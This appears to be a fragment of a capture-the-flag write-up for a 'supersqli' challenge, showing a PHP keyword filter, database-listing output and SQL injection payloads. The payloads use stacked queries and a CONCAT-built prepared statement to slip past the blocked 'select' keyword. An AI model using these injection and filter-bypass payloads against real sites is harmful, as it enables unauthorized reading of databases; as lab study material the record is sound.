return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}

1'; show columns from `1919810931114514` from supersqli #

1';Set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

